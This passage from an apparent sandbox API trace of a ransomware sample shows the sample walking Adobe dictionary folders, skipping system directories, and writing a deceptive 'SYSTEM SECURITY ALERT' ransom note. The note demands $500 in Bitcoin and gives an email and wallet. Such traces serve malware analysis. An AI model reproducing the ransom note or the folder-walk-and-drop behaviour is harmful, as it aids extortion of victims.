HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.410] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.410] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.411] lstrlenA (lpString="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") returned 684 [0087.411] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.411] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.411] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.411] CloseHandle (hObject=0x154) returned 1 [0087.411] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="Windows") returned -1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="Program Files") returned -1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="Program Files (x86)") returned -1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="$Recycle.bin") returned 1 [0087.411] lstrcmpiW (lpString1="dan", lpString2="System Volume Information") returned -1 [0087.411] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned 109 [0087.411] lstrcmpW (lpString1="dan", lpString2=".") returned 1 [0087.412] lstrcmpW (lpString1="dan", lpString2="..") returned 1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*") returned 111 [0087.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.412] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.412] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.412] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.412] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.412] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\.") returned 111 [0087.412] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.412] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.412] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.412] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.412] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.412] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.412] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\..") returned 112 [0087.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.412] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
lpFindFileData=0x295e2f0) returned 0 [0087.412] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.412] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\RESTORE_FILES.txt") returned 127 [0087.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dan\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.413] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.413] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.414] lstrlenA (lpString="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") returned 684 [0087.414] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.414] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.414] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0087.414] CloseHandle (hObject=0x154) returned 1 [0087.414] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="Windows") returned -1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="Program Files") returned -1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="Program Files (x86)") returned -1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="$Recycle.bin") returned 1 [0087.414] lstrcmpiW (lpString1="dut", lpString2="System Volume Information") returned -1 [0087.414] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned 109 [0087.415] lstrcmpW (lpString1="dut", lpString2=".") returned 1 [0087.415] lstrcmpW (lpString1="dut", lpString2="..") returned 1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*") returned 111 [0087.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.415] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.415] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.415] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.415] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.415] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\.") returned 111 [0087.415] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.415] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.415] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.415] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.415] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.415] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.415] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\..") returned 112 [0087.415] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.415] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.415] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.415] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.415] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\RESTORE_FILES.txt") returned 127 [0087.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dut\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.416] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.416] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.417] lstrlenA (lpString="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") returned 684 [0087.417] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, 
lpOverlapped=0x0) returned 1 [0087.417] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.417] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.417] CloseHandle (hObject=0x154) returned 1 [0087.417] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="Windows") returned -1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="Program Files") returned -1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="Program Files (x86)") returned -1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="$Recycle.bin") returned 1 [0087.417] lstrcmpiW (lpString1="eng", lpString2="System Volume Information") returned -1 [0087.417] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned 109 [0087.417] lstrcmpW (lpString1="eng", lpString2=".") returned 1 [0087.417] lstrcmpW (lpString1="eng", lpString2="..") returned 1 [0087.417] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*") returned 111 [0087.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.417] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0087.417] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.417] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.417] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.417] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\.") returned 111 [0087.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.417] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.417] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.417] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.417] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.418] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.418] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.418] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\..") returned 112 [0087.418] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.418] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.418] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.418] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.418] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\RESTORE_FILES.txt") returned 127 [0087.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\eng\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.419] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.419] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.419] lstrlenA (lpString="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") returned 684 [0087.419] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.419] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.420] CloseHandle (hObject=0x154) returned 1 [0087.420] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="Windows") returned -1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="Program Files") returned -1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="Program Files (x86)") returned -1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="$Recycle.bin") returned 1 [0087.420] lstrcmpiW (lpString1="frn", lpString2="System Volume Information") returned -1 [0087.420] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned 109 [0087.420] lstrcmpW (lpString1="frn", lpString2=".") returned 1 [0087.420] lstrcmpW (lpString1="frn", lpString2="..") returned 1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*") returned 111 [0087.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\.") returned 111 [0087.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.420] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.420] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.420] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.420] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.420] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\..") returned 112 [0087.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.420] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
lpFindFileData=0x295e2f0) returned 0 [0087.420] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.420] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\RESTORE_FILES.txt") returned 127 [0087.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\frn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.421] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.421] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.421] lstrlenA (lpString="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") returned 684 [0087.421] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 